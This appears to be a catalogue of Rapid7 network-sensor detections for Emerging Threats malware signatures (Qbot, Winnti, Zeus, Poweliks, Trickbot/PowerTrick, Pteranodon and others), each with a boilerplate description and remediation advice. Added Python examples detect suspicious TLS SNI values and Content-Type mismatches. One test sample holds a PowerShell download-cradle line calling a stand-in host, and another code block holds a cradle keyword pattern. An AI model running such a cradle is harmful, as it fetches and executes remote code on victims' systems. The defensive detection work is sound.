This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Qbot/Quakbot Checkin via HTTP GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/SillyFDC WordPress Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/SysJoker Retrieving CnC Information (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Travnet.A Internet Connection Check (microsoft.com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Winnti TLS Certificate Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Winnti TLS SNI Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.
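A TLS SNI Observed signature such as the one above fires on the server_name a client presents in its ClientHello, before any certificate is exchanged. As an added example, not code from this page or from the Emerging Threats rule set, the Python below builds a few ClientHello records, extracts the SNI from them and checks it against a watchlist. The hostnames, the watchlist and the records are constructed for illustration and are not Winnti indicators.

```python
"""Extract the SNI from a TLS ClientHello and compare it with a watchlist.

Added example: the records, hostnames and watchlist are constructed here and
stand in for the indicators an ET "TLS SNI Observed" rule matches on.
"""
import struct

# Assumed indicators; not Winnti infrastructure.
SNI_WATCHLIST = ("update.example.invalid", "cdn-sync.example.invalid")


def build_client_hello(server_name=None, leading_ext: bytes = b"") -> bytes:
    """Minimal TLS 1.2-style ClientHello record; SNI extension only if a name is given."""
    exts = leading_ext
    if server_name is not None:
        name = server_name.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type 0 = host_name
        sni_list = struct.pack("!H", len(entry)) + entry
        exts += struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    body = (
        b"\x03\x03" + b"\x11" * 32                                  # client_version, fixed random
        + b"\x00"                                                   # empty session_id
        + struct.pack("!H", 4) + b"\x13\x01\x13\x02"                # two cipher suites
        + b"\x01\x00"                                               # null compression only
        + struct.pack("!H", len(exts)) + exts
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """host_name from the server_name extension of a ClientHello record, or None."""
    if len(record) < 9 or record[0] != 0x16:
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 34                                   # client_version (2) + random (32)
    if len(body) < pos + 1:
        return None
    pos += 1 + body[pos]                       # session_id
    if len(body) < pos + 2:
        return None
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
    if len(body) < pos + 1:
        return None
    pos += 1 + body[pos]                       # compression_methods
    if len(body) < pos + 2:
        return None                            # no extensions block at all
    ext_end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= min(ext_end, len(body)):
        etype, elen = struct.unpack("!HH", body[pos:pos + 4])
        data = body[pos + 4:pos + 4 + elen]
        pos += 4 + elen
        if etype != 0x0000:
            continue
        lpos = 2                               # skip server_name_list length
        while lpos + 3 <= len(data):
            name_type = data[lpos]
            name_len = struct.unpack("!H", data[lpos + 1:lpos + 3])[0]
            if name_type == 0:
                return data[lpos + 3:lpos + 3 + name_len].decode("ascii", "replace")
            lpos += 3 + name_len
    return None


def check_client_hello(record: bytes):
    """Alert string when the SNI equals or sits under a watchlist entry, else None."""
    sni = extract_sni(record)
    if sni is None:
        return None
    host = sni.lower().rstrip(".")
    for indicator in SNI_WATCHLIST:
        if host == indicator or host.endswith("." + indicator):
            return f"TLS SNI {host} matches watchlist entry {indicator}"
    return None


# Constructed records: a direct hit, a subdomain hit behind another extension, a miss, no SNI.
SUPPORTED_VERSIONS_EXT = struct.pack("!HH", 0x002B, 3) + b"\x02\x03\x04"
SAMPLES = {
    "direct_hit": build_client_hello("update.example.invalid"),
    "subdomain_hit": build_client_hello("a.cdn-sync.example.invalid", SUPPORTED_VERSIONS_EXT),
    "benign": build_client_hello("www.example.org"),
    "no_sni": build_client_hello(),
}


def run_samples() -> dict:
    return {name: check_client_hello(rec) for name, rec in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:14s} sni={extract_sni(SAMPLES[name])!r:32} {verdict or 'no alert'}")
```

When triaging a real hit, the SNI is only what the client claimed; confirm it against the server certificate and the destination IP before treating it as more than a lead, and remember that a client using Encrypted Client Hello or no SNI at all will never trigger this kind of rule.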

ET MALWARE Possible Worm W32.Svich or Other Infection Request for setting.doc

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Worm W32.Svich or Other Infection Request for setting.xls

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Zbot Activity Common Download Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Zeus GameOver Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Zeus GameOver Connectivity Check 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possible Zeus P2P Variant Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Possibly SLIGHTPULSE Related - Suspicious POST to Specific URI Path

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potao CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potao CnC POST Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potential Blackhole Exploit Pack Binary Load Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potential FakeAV HTTP GET Check-IN (/check)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potential FakePAV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Potentially Unwanted Program RebateInformerSetup.exe Download Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Poweliks Abnormal HTTP Headers high likelihood of Poweliks infection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Poweliks Clickfraud CnC M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Powershell commands sent when remote host claims to send an image

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.
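The signature above and ET MALWARE Possible Windows executable sent when remote host claims to send a Text File both key on the same thing: the HTTP Content-Type header promises one kind of content and the response body carries another (a PE image behind text/plain, a PowerShell download cradle behind image/*). As an added example, not code from this page or from the Emerging Threats rule set, the Python below reproduces that check over constructed HTTP responses. The PowerShell keyword list, the minimal PE stub and the sample responses are assumptions chosen for illustration, not the rules' actual content matches; the PE check goes beyond a bare "MZ" match by following e_lfanew to the PE signature.

```python
"""Flag HTTP responses whose Content-Type disagrees with the delivered bytes.

Added example (constructed samples, not captured traffic); the keyword list
and the PE stub are assumptions, not the ET rules' actual content matches.
"""
import re

# Assumed PowerShell download-cradle vocabulary.
POWERSHELL_RE = re.compile(
    rb"(?i)\b(?:powershell|invoke-expression|iex|invoke-webrequest|"
    rb"downloadstring|frombase64string|new-object)\b"
)
IMAGE_MAGICS = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1", "replace"), headers, body


def declared_type(headers: dict) -> str:
    """Media type from Content-Type, without parameters such as charset."""
    return headers.get("content-type", "").split(";", 1)[0].strip().lower()


def is_pe(body: bytes) -> bool:
    """True for a PE image: 'MZ' at offset 0 and 'PE\\0\\0' at the e_lfanew offset."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def looks_like_image(body: bytes) -> bool:
    return any(body.startswith(magic) for magic in IMAGE_MAGICS)


def check_response(raw: bytes) -> list:
    """Alert strings for one HTTP response; empty list when type and bytes agree."""
    _, headers, body = parse_http_response(raw)
    ctype = declared_type(headers)
    alerts = []
    if ctype.startswith("text/") and is_pe(body):
        alerts.append("Windows executable sent as " + ctype)
    if ctype.startswith("image/"):
        if is_pe(body):
            alerts.append("Windows executable sent as " + ctype)
        elif not looks_like_image(body) and POWERSHELL_RE.search(body):
            alerts.append("PowerShell commands sent as " + ctype)
    return alerts


def minimal_pe_stub() -> bytes:
    """Constructed 88-byte stand-in for a PE file: e_lfanew (0x40) points at 'PE\\0\\0'."""
    return b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\x00" * 20


def http_response(ctype: str, body: bytes) -> bytes:
    """Constructed HTTP/1.1 200 response with the given Content-Type and body."""
    head = f"HTTP/1.1 200 OK\r\nContent-Type: {ctype}\r\nContent-Length: {len(body)}\r\n\r\n"
    return head.encode("ascii") + body


SAMPLES = {
    "pe_as_text": http_response("text/plain; charset=utf-8", minimal_pe_stub()),
    "pe_as_gif": http_response("image/gif", minimal_pe_stub()),
    "powershell_as_jpeg": http_response(
        "image/jpeg",
        b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\r\n",
    ),
    "real_png": http_response("image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    "benign_text": http_response("text/plain", b"The string MZ mid-body is not a PE header.\n"),
}


def run_samples() -> dict:
    """Sample name -> alerts, so the result can be inspected or asserted on."""
    return {name: check_response(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, alerts in run_samples().items():
        print(f"{name:20s} {alerts or 'no alert'}")
```

The same comparison is the quickest way to validate a sensor hit during triage: pull the response body from the capture, look at its first bytes, and compare them with the Content-Type the server declared. A legitimate server rarely labels a PE image as text or an image, so a confirmed mismatch is worth the host rebuild the recommendation calls for.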

ET MALWARE PowerShell Downloader CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Powershell Octopus Backdoor Sending System Information (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PowerShell Script Downloading Emotet DLL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Powershell with Decimal Encoded RUNPE Downloaded

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PowerTrick download bot known key

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick download ver1 bot

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick download ver2 bot

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Known Key 1

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Known Key 2

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Answer

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Checkin M1

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Checkin M2

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PowerTrick Task Request

Description

Trickbot is a modular Trojan that was initially developed as a banking Trojan in 2016. It has since evolved into a complex, modular framework that can also act as a dropper for follow-on malware such as Ryuk, or for post-exploitation frameworks such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types. The PowerTrick signatures cover a PowerShell-based backdoor that Trickbot's operators deploy on systems of interest after the initial infection.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. It is updated frequently with new modules that add capabilities such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation

Restore systems impacted by Trickbot to a known good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide user training on electronic social engineering, and advise users not to interact with attachments or URLs in suspicious emails.

ET MALWARE PPI User-Agent (InstallCapital)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PRG/wnspoem/Zeus InfoStealer Trojan Config Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Project Plague CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBot Phone Home Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - botinfo.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - .com.tw/check_version.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - getiplist.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - get_servers.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - POST 1-letter.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - proxy_info.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Proxychecker Lookup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Proyecto RAT Variant - Yopmail Login attempt (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE Proyecto RAT Variant - Yopmail Stage 2 CnC Retrieval

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PS/Beapy CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PSEmpire Checkin via POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known good source and have the user change their password.

ET MALWARE PS/SunCrypt Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE PS/Unk.EB.Spreader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Backdoor CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 1 Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 2 Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 3 Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PT MALWARE] Hacked Mikrotik C2 Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Adwind SSL Certificate Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

